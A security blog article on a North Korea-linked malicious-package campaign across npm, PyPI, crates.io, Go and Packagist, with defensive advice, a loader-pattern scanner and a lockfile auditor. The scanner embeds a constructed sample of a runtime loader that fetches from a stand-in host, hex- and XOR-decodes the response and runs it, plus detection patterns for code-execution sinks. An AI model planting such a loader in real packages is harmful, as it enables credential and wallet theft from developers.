How North Korean Hackers Flooded npm

In the world of open-source software, trust is the ultimate currency. You npm install a logging utility, a debugging helper, or a license checker, and you move on—confident that the package does exactly what its name promises. But what if that innocent-looking dependency was quietly built in Pyongyang?


That nightmare became reality in early 2025. A North Korea-linked campaign codenamed Contagious Interview has now published more than 1,700 malicious packages across npm, PyPI, Go Modules, crates.io (Rust), and Packagist (PHP). The latest wave, detailed in early April 2026, shows the attackers expanding their factory-style operation into Go, Rust, and PHP while keeping the core playbook that has already delivered tens of thousands of downloads to unsuspecting developers.

The Campaign That Refuses to Die

Contagious Interview didn’t start with npm spam. It began as a classic social-engineering operation: North Korean operators (tracked as UNC1069, BlueNoroff, Sapphire Sleet, and Stardust Chollima) posed as tech recruiters on LinkedIn, Telegram, and Slack. They offered fake job interviews, sent “coding test” assignments hosted on polished GitHub repos, and lured Web3 and blockchain developers into downloading malicious starter templates.

The twist? Those templates contained hidden dependencies that pulled in the real payload.

By late 2024 the attackers realized they could skip the middleman. Why social-engineer one victim at a time when you can publish thousands of packages that millions of developers might pull in automatically?

The result: a relentless torrent of malicious uploads. Socket Security has tracked 1,733 malicious artifacts since January 2025, with fresh waves hitting every few weeks. Some packages were taken down, only to reappear under slightly different names days later. It’s not chaos—it’s a well-oiled malware factory.

How the Packages Actually Work (It’s Sneakier Than You Think)

Most npm malware runs from an install hook (preinstall or postinstall) the moment you run npm install. These packages don't.

The malicious packages are carefully crafted to look and behave like legitimate developer tools:

  • npm examples: dev-log-core, logger-base, logkitx, pino-debugger, debug-fmt, debug-glitz
  • PyPI: logutilkit, apachelicense, fluxhttp, license-utils-kit
  • Rust (crates.io): logtrace
  • Go & PHP: similarly themed license and logging utilities

The malicious code is not executed during installation. Instead, it hides inside normal-looking functions that match the package's advertised purpose. In the Rust crate logtrace, for example, the payload lives inside Logger::trace(i32). A developer calls what they think is a harmless logging method, and boom: second-stage malware downloads. The practical consequence is that installing with scripts disabled (npm install --ignore-scripts) offers no protection here, and any scanner that only inspects install hooks will give these packages a clean bill of health. The payload fires wherever the library is first exercised, which may be a unit test in CI rather than a developer's laptop.
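The check a practitioner wants for this pattern is not "does it have a postinstall hook?" but "does any ordinary function both fetch remote data and hand it to a code-execution sink?" The following is an added example, not Socket's tooling or code from the packages above: a heuristic scanner that looks for that fetch-decode-execute shape within a short window of lines, and reports install hooks separately so the two signals are not conflated. The two package sources it scans are constructed stand-ins (the "sleeper" one uses a reserved .invalid host and is never executed); the regexes, window size and severity labels are the author's assumptions.

```javascript
// Added example (not Socket's tooling or the article's code): a heuristic
// scan for "sleeper" loaders that only run when a library function is
// called. It works on in-memory sources so it runs offline; to scan a real
// package, read node_modules/<pkg> into the same { file: source } shape.

// Indicators, checked per line. No 'g' flag, so the regexes stay stateless.
const NETWORK = [/\bfetch\s*\(/, /\bhttps?\.(get|request)\s*\(/, /\baxios\.(get|post)\s*\(/];
const EXEC = [/\beval\s*\(/, /\bnew\s+Function\s*\(/, /\bvm\.runIn(This|New)Context\s*\(/,
  /\bchild_process\b/, /\bexecSync\s*\(/];
const DECODE = [/\bBuffer\.from\s*\([^)]*,\s*['"](hex|base64)['"]\)/, /\^\s*0x[0-9a-f]+/i];
// Install hooks are what most scanners look at; their absence proves nothing here.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const WINDOW = 40; // lines: a fetch and an exec this close together is the loader shape

// First line in [start, start+len) matching any pattern, 1-based, or -1.
function firstMatch(lines, patterns, start, len) {
  const end = Math.min(lines.length, start + len);
  for (let j = start; j < end; j++) {
    if (patterns.some(r => r.test(lines[j]))) return j + 1;
  }
  return -1;
}

// Report the first window where a network fetch and a code-execution sink co-occur.
function scanSource(file, source) {
  const lines = source.split('\n');
  for (let i = 0; i < lines.length; i++) {
    const networkLine = firstMatch(lines, NETWORK, i, WINDOW);
    const execLine = firstMatch(lines, EXEC, i, WINDOW);
    if (networkLine < 0 || execLine < 0) continue;
    const decodeLine = firstMatch(lines, DECODE, i, WINDOW);
    return [{ file, networkLine, execLine, decodeLine,
      severity: decodeLine > 0 ? 'high' : 'medium',
      reason: 'fetches remote data and executes code in the same function body' }];
  }
  return [];
}

// pkg = { name, manifest: parsed package.json, files: { relativePath: source } }
function scanPackage(pkg) {
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  const findings = [];
  for (const [file, src] of Object.entries(pkg.files)) {
    if (/\.[cm]?js$/.test(file)) findings.push(...scanSource(file, src));
  }
  return {
    name: pkg.name,
    installHooks: INSTALL_HOOKS.filter(h => h in scripts),
    findings,
    verdict: findings.length ? 'suspicious: runtime loader pattern' : 'no loader pattern found',
  };
}

// Constructed samples. The second is a stand-in for the shape the article
// describes (payload inside an advertised logging function), not real malware:
// the host is a reserved .invalid name and nothing here is ever executed.
const BENIGN_LOGGER = [
  "const util = require('node:util');",
  'function trace(level, msg) {',
  "  const line = '[' + level + '] ' + util.format(msg);",
  "  process.stderr.write(line + '\\n');",
  '  return line;',
  '}',
  'module.exports = { trace };',
].join('\n');

const SLEEPER_LOGGER = [
  "const https = require('node:https');",               // 1
  'function trace(level, msg) {',                        // 2
  "  process.stderr.write(level + ': ' + msg + '\\n');", // 3  looks like logging
  "  https.get('https://example.invalid/p', res => {",   // 4  ...then phones home
  "    let body = '';",                                  // 5
  "    res.on('data', d => { body += d; });",            // 6
  "    res.on('end', () => {",                           // 7
  "      const raw = Buffer.from(body, 'hex');",         // 8  hex-decode...
  "      let out = '';",                                 // 9
  '      for (const b of raw) out += String.fromCharCode(b ^ 0x5a);', // 10 ...XOR...
  '      new Function(out)();',                          // 11 ...and run it
  '    });',
  '  });',
  '}',
  'module.exports = { trace };',
].join('\n');

function runSample() {
  return {
    benign: scanPackage({ name: 'benign-logger', manifest: { scripts: { test: 'node test.js' } },
      files: { 'index.js': BENIGN_LOGGER } }),
    sleeper: scanPackage({ name: 'sleeper-logger', manifest: { scripts: {} },
      files: { 'index.js': SLEEPER_LOGGER } }),
  };
}

console.log(JSON.stringify(runSample(), null, 2));
```

The sleeper sample has no install hooks at all, which is exactly why hook-only checks miss it; the scanner instead flags lines 4, 8 and 11 of that file. Expect false positives on legitimate HTTP clients that also spawn processes, so treat a hit as a prompt to read the code, not as a verdict.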

These loaders (some named HexEval, others the newer XORIndex) fetch platform-specific payloads that deliver full-featured infostealers and RATs. The malware targets:

  • Web browser credentials and cookies
  • Password managers
  • Cryptocurrency wallets
  • CI/CD environment variables and tokens

One Windows variant even deploys AnyDesk for persistent remote access, takes screenshots, logs keystrokes, and exfiltrates data in encrypted archives. The goal is crystal clear: financial theft (crypto) and long-term espionage inside developer machines and corporate networks.

Why This Campaign Is Different

Most npm malware campaigns are opportunistic—typosquatting a popular package or sneaking in a backdoor once. Contagious Interview is industrial-scale and cross-ecosystem.

  • It spans five major registries simultaneously.
  • It uses “sleeper” packages that sit dormant until the right function is called.
  • It leverages the exact same social-engineering infrastructure (fake personas, GitHub templates, Vercel-hosted C2) that the group has perfected over years of fake-job lures.
  • It evolves: new loaders, steganography via Pastebin, multi-stage obfuscation, and rapid re-uploads after takedowns.

In short, this isn’t a one-off attack. It’s a persistent, state-backed supply-chain operation designed to turn the entire open-source ecosystem into an initial-access vector.

The Broader North Korean Playbook

This campaign doesn’t exist in isolation. The same actors (or closely affiliated ones) were behind the March 2026 Axios npm compromise that briefly backdoored a library with over 100 million weekly downloads. Different tactic (compromised maintainer account), same endgame: get code execution on developer laptops and corporate build servers.

The message from Pyongyang is loud and clear: if you build software, you are a target.

What You Should Do Right Now

  1. Audit your dependency tree – Tools like Socket, Dependabot, or npm audit can flag suspicious packages, but don't rely on them alone: npm audit only reports packages that already have a published advisory, so a package uploaded last week is invisible to it. Look for anything with "log", "debug", "license", or "utils" in the name that you don't explicitly remember adding, and trace which parent pulled it in.
  2. Verify package authors – Especially for recently created packages or maintainer accounts. GitHub stars are not an npm signal; check the publish history, whether the linked repository actually exists, and whether its contents match the published tarball.
  3. Use lockfiles religiously – Pin exact versions, commit the lockfile, and install with npm ci so CI cannot resolve a newer release on its own. Note that --ignore-scripts does not help against this campaign: the payload runs when your code calls the function, not at install time.
  4. Treat job-offer coding tests with extreme skepticism – If a recruiter asks you to clone a private GitHub repo or install a "test environment" package, assume it's malicious until proven otherwise.
  5. Enable 2FA everywhere – npm, GitHub, PyPI, etc. The attackers have already shown they can compromise maintainer accounts; where the registry supports it, publish from CI with trusted publishing rather than long-lived tokens stored on a laptop.
  6. Monitor for anomalous network traffic – Especially outbound connections to raw IPs or unusual domains during builds, test runs, and from developer laptops: with this campaign the first beacon comes from whichever process first calls the booby-trapped function.
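Steps 1 and 3 can be turned into a single offline check over the lockfile you already commit. The following is an added example, not from the article or from any of the tools it names: it audits a package-lock.json (lockfileVersion 2 or 3) for loose version ranges on direct dependencies, themed transitive packages you never added yourself (with the parent that pulled them in), install scripts, tarballs resolved from outside the registry, and entries with no integrity hash. The sample lockfile is constructed and truncated; the versions and integrity values are made up, and the keyword list and registry URL are assumptions you should adjust.

```javascript
// Added example, not from the article: audit a package-lock.json offline for
// the warning signs in the checklist above. SAMPLE_LOCK is constructed; its
// versions and integrity hashes are invented and most of express's real
// dependency tree is omitted to keep it short.
const SUSPECT_WORDS = ['log', 'debug', 'license', 'util']; // assumed keyword list
const REGISTRY = 'https://registry.npmjs.org/';            // assumed: public registry only

// Does a package.json specifier pin one exact version (no ^, ~, *, ranges or tags)?
function isExactPin(spec) {
  return /^\d+\.\d+\.\d+(-[\w.-]+)?$/.test(spec);
}

// 'node_modules/a/node_modules/@s/b' -> '@s/b'
function pkgName(lockPath) {
  const i = lockPath.lastIndexOf('node_modules/');
  return lockPath.slice(i + 'node_modules/'.length);
}

function auditLock(lock) {
  const pkgs = lock.packages || {};
  const root = pkgs[''] || {};
  const direct = Object.assign({}, root.dependencies || {}, root.devDependencies || {});
  const findings = [];

  // Rule 1: direct deps should be exact pins. The lockfile plus `npm ci` hold the
  // version, but a loose range is what lets a malicious "patch" release in on
  // the next `npm install` or `npm update`.
  for (const [name, spec] of Object.entries(direct)) {
    if (!isExactPin(spec)) findings.push({ pkg: name, rule: 'loose-range', detail: spec });
  }

  // Who pulled in whom: dependency name -> parents that declare it.
  const parents = {};
  for (const [p, meta] of Object.entries(pkgs)) {
    if (p === '') continue;
    for (const child of Object.keys(meta.dependencies || {})) {
      (parents[child] = parents[child] || []).push(pkgName(p));
    }
  }

  for (const [p, meta] of Object.entries(pkgs)) {
    if (p === '') continue;
    const name = pkgName(p);
    // Rule 2: themed names you did not add yourself.
    if (!(name in direct) && SUSPECT_WORDS.some(w => name.includes(w))) {
      findings.push({ pkg: name, rule: 'themed-transitive',
        detail: 'pulled in by ' + (parents[name] || ['?']).join(', ') });
    }
    // Rule 3: install hooks. Not this campaign's trigger, but still worth knowing.
    if (meta.hasInstallScript) findings.push({ pkg: name, rule: 'install-script', detail: 'v' + meta.version });
    // Rule 4: tarballs from outside the registry, or nothing to verify them against.
    if (!meta.link && (!meta.resolved || !meta.resolved.startsWith(REGISTRY))) {
      findings.push({ pkg: name, rule: 'off-registry', detail: meta.resolved || '(no resolved url)' });
    }
    if (!meta.link && !meta.integrity) findings.push({ pkg: name, rule: 'no-integrity', detail: 'v' + meta.version });
  }
  return findings;
}

// Constructed lockfile: one loose range, one themed transitive dep with an
// install hook, one off-registry tarball without an integrity hash.
const SAMPLE_LOCK = {
  name: 'demo-app', lockfileVersion: 3,
  packages: {
    '': { dependencies: { express: '4.19.2', 'debug-fmt': '^1.0.0' } },
    'node_modules/express': { version: '4.19.2',
      resolved: REGISTRY + 'express/-/express-4.19.2.tgz', integrity: 'sha512-AAAA' },
    'node_modules/debug-fmt': { version: '1.0.3',
      resolved: REGISTRY + 'debug-fmt/-/debug-fmt-1.0.3.tgz', integrity: 'sha512-BBBB',
      dependencies: { logkitx: '*' } },
    'node_modules/logkitx': { version: '0.0.2',
      resolved: REGISTRY + 'logkitx/-/logkitx-0.0.2.tgz', integrity: 'sha512-CCCC',
      hasInstallScript: true },
    'node_modules/left-pad': { version: '1.3.0', resolved: 'https://example.invalid/left-pad.tgz' },
  },
};

// `node audit-lock.js path/to/package-lock.json`, or no argument for the sample.
if (typeof require !== 'undefined' && require.main === module) {
  const file = process.argv[2];
  const lock = file ? JSON.parse(require('node:fs').readFileSync(file, 'utf8')) : SAMPLE_LOCK;
  console.table(auditLock(lock));
}
```

On the sample this yields five findings: the loose range on debug-fmt, logkitx as a themed package pulled in by debug-fmt (plus its install script), and left-pad both resolved off-registry and lacking an integrity hash. A clean run proves only that nothing looks wrong at the manifest level; the runtime-triggered loaders described earlier still need a look at the code itself.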

The Bottom Line

Open source gave us incredible velocity. North Korean hackers are now using that same velocity against us.

Over 1,700 malicious packages. Tens of thousands of downloads. Five ecosystems. And the campaign is still accelerating.

The next time you run npm install, remember: somewhere in the dependency graph, a package might be waiting for the right function call to phone home to Pyongyang.

Stay paranoid. Verify everything. And maybe—just maybe—think twice before adding that shiny new logging utility.

The open-source ecosystem is only as secure as the least-vetted package in it. Right now, that bar is dangerously low.

Stay safe out there.
